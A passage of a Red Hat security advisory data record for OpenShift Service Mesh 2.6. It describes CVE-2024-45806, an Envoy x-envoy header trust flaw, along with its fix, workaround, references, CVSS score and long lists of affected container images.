"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, { acknowledgments: [ { names: [ "Mike Whale", ], }, { names: [ "James Force", ], organization: "Red Hat", summary: "This issue was discovered by Red Hat.", }, ], cve: "CVE-2024-45806", cwe: { id: "CWE-639", name: "Authorization Bypass Through User-Controlled Key", }, discovery_date: "2024-09-20T00:40:20.976812+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313683", }, ], notes: [ { category: "description", text: "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy's default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Potential to manipulate `x-envoy` headers from external sources", title: "Vulnerability summary", }, { category: "other", text: "Red Hat's CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45806", }, { category: "external", summary: "RHBZ#2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45806", url: "https://www.cve.org/CVERecord?id=CVE-2024-45806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", }, ], release_date: "2024-09-20T00:15:02.293000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", 